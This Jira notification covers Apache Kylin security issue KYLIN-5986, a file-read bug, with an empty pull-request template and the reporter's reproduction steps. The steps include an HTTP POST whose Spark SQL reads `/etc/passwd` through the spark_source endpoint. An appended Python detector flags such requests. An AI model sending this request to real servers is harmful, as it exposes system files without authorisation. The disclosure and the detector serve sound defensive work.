[ https://issues.apache.org/jira/browse/KYLIN-5986?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17926685#comment-17926685 ]

ASF GitHub Bot commented on KYLIN-5986:
---------------------------------------

jlfsdtc opened a new pull request, #2248:
URL: https://github.com/apache/kylin/pull/2248

   ## Proposed changes
   
   Describe the big picture of your changes here to communicate to the 
maintainers why we should accept this pull request. If it fixes a bug or 
resolves a feature request, be sure to link to that issue.
   
   ## Branch to commit
   - [ ] Branch **kylin3** for v2.x to v3.x
   - [ ] Branch **kylin4** for v4.x
   - [x] Branch **kylin5** for v5.x
   
   ## Types of changes
   
   What types of changes does your code introduce to Kylin?
   _Put an `x` in the boxes that apply_
   
   - [x] Bugfix (non-breaking change which fixes an issue)
   - [ ] New feature (non-breaking change which adds functionality)
   - [ ] Breaking change (fix or feature that would cause existing 
functionality to not work as expected)
   - [ ] Documentation Update (if none of the other choices apply)
   
   ## Checklist
   
   _Put an `x` in the boxes that apply. You can also fill these out after 
creating the PR. If you're unsure about any of them, don't hesitate to ask. 
We're here to help! This is simply a reminder of what we are going to look for 
before merging your code._
   
   - [x] I have created an issue on [Kylin's 
jira](https://issues.apache.org/jira/browse/KYLIN), and have described the 
bug/feature there in detail
   - [x] Commit messages in my PR start with the related jira ID, like 
"KYLIN-0000 Make Kylin project open-source"
   - [ ] Compiling and unit tests pass locally with my changes
   - [ ] I have added tests that prove my fix is effective or that my feature 
works
   - [ ] I have added necessary documentation (if appropriate)
   - [x] Any dependent changes have been merged
   
   ## Further comments
   
   If this is a relatively large or complex change, kick off the discussion at 
[email protected] or [email protected] by explaining why you chose the 
solution you did and what alternatives you considered, etc...
   




> [Security] Apache kylin read any file
> -------------------------------------
>
>                 Key: KYLIN-5986
>                 URL: https://issues.apache.org/jira/browse/KYLIN-5986
>             Project: Kylin
>          Issue Type: Bug
>    Affects Versions: 5.0.0
>            Reporter: Longfei Jiang
>            Assignee: Longfei Jiang
>            Priority: Major
>             Fix For: 5.0.1
>
>         Attachments: Fwd_ [Security]Apache kylin read any file.eml, 
> image-2025-02-13-11-11-05-091.png, image-2025-02-13-11-11-30-021.png, 
> image-2025-02-13-11-11-40-004.png, image-2025-02-13-11-11-48-871.png, 
> image-2025-02-13-11-11-57-464.png
>
>
> *1. start kylin-docker*
> ```sh
> docker run --platform=linux/amd64 -d --name Kylin5-Machine \
>     --hostname localhost -e TZ=UTC -m 10G \
>     -p 7070:7070 -p 8088:8088 -p 9870:9870 \
>     -p 8032:8032 -p 8042:8042 -p 2181:2181 \
>     apachekylin/apache-kylin-standalone:5.0.0-GA
> ```
> *2. change kylin.properties*
> Add `kylin.env.channel=cloud` into the file `kylin.properties`. This is to 
> make `org.apache.kylin.rest.controller.SparkSourceController` work
>  !image-2025-02-13-11-11-05-091.png!
> *3. restart server*
> ```
> ./kylin.sh stop
> ./kylin.sh start
> ```
> # Exploit
> 1. Log in to the backend using an administrator account
> 2. HTTP access `/kylin/api/spark_source/execute` to execute Spark SQL
> ```http
> POST /kylin/api/spark_source/execute HTTP/1.1
> Host: 127.0.0.1:7070
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Viewer/99.9.8782.87
> Accept: application/vnd.apache.kylin-v4+json
> Accept-Language: cn
> Accept-Encoding: gzip, deflate, br
> Auto: false
> X-Requested-With: XMLHttpRequest
> DNT: 1
> Connection: keep-alive
> Referer: http://127.0.0.1:7070/kylin/
> Cookie: c24882d0760bcad26b31ef95baaaa0ed96ea8fd461b11a9695cff5e969b6d4da=MTI5MjBjZGUtNDk1Yi00YzNhLTk4OTYtMmNhOWYwZDU1MWY2; session=c354aed6-c0e1-4463-98de-c26bc4df312f.o-aV6G0ydMKHAQ43gc1Cc0tOndE
> Sec-Fetch-Dest: empty
> Sec-Fetch-Mode: cors
> Sec-Fetch-Site: same-origin
> sec-ch-ua-platform: "Windows"
> sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not=A?Brand";v="24"
> sec-ch-ua-mobile: ?0
> Content-Type: application/json
> Content-Length: 94
>
> {"sql":"CREATE TABLE temp_tablea AS SELECT * from text.`file:///etc/passwd`","database":"SSB"}
> ```
>  !image-2025-02-13-11-11-30-021.png!
> 3. Add new source
>  !image-2025-02-13-11-11-40-004.png!
> 4. Click `Refresh now`; this is to load tables.
>  !image-2025-02-13-11-11-48-871.png!
> 5. Execute the sql statement `select * from SSB.TEMP_TABLEA` to get the 
> contents of the `/etc/passwd` file
>  !image-2025-02-13-11-11-57-464.png!
> The detailed information can be found in the email attachment: Fwd_ 
> [Security]Apache kylin read any file.eml



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
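
Added example (not part of the Jira issue, the pull request or the Kylin code base): a Python check a defender could run over request bodies captured for `/kylin/api/spark_source/execute`. It flags Spark SQL that reads a file directly through a format name followed by a backquoted path, as in the report, and checks whether `kylin.env.channel=cloud` is set. The function names, the format list and the sample bodies are assumptions constructed for illustration.

```python
import json
import re

# Spark SQL can query a file directly with  <format>.`<path>`  in place of a table.
# The format list is an assumption covering common built-in sources, not Kylin's own list.
DIRECT_FILE = re.compile(
    r"\b(text|csv|json|parquet|orc|avro|binaryfile)\s*\.\s*`([^`]*)`",
    re.IGNORECASE,
)


def direct_file_reads(sql):
    """Return (format, path) for every direct-file source named in the statement."""
    return [(m.group(1).lower(), m.group(2).strip()) for m in DIRECT_FILE.finditer(sql)]


def review_request(body):
    """Classify one JSON body sent to /kylin/api/spark_source/execute."""
    try:
        sql = json.loads(body).get("sql", "")
    except (ValueError, AttributeError):
        return {"verdict": "unparseable", "hits": []}
    hits = direct_file_reads(sql) if isinstance(sql, str) else []
    if any(path.lower().startswith("file:") for _, path in hits):
        return {"verdict": "local-file-read", "hits": hits}
    # A database literally named like a format also lands here, so treat it as "review".
    return {"verdict": "direct-file-source" if hits else "ok", "hits": hits}


def spark_source_enabled(properties_text):
    """True if kylin.env.channel ends up set to cloud (last assignment wins)."""
    value = None
    for line in properties_text.splitlines():
        key, sep, val = line.strip().partition("=")
        if sep and not key.startswith("#") and key.strip() == "kylin.env.channel":
            value = val.strip()
    return value == "cloud"


# Constructed sample bodies; the first is the statement from the report.
SAMPLES = [
    '{"sql":"CREATE TABLE temp_tablea AS SELECT * from text.`file:///etc/passwd`","database":"SSB"}',
    '{"sql":"SELECT * FROM parquet.`hdfs://nn/warehouse/part-0.parquet`","database":"SSB"}',
    '{"sql":"SELECT count(*) FROM SSB.TEMP_TABLEA","database":"SSB"}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(review_request(body)["verdict"], body)
    print("spark_source enabled:", spark_source_enabled("kylin.env.channel=cloud\n"))
```
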
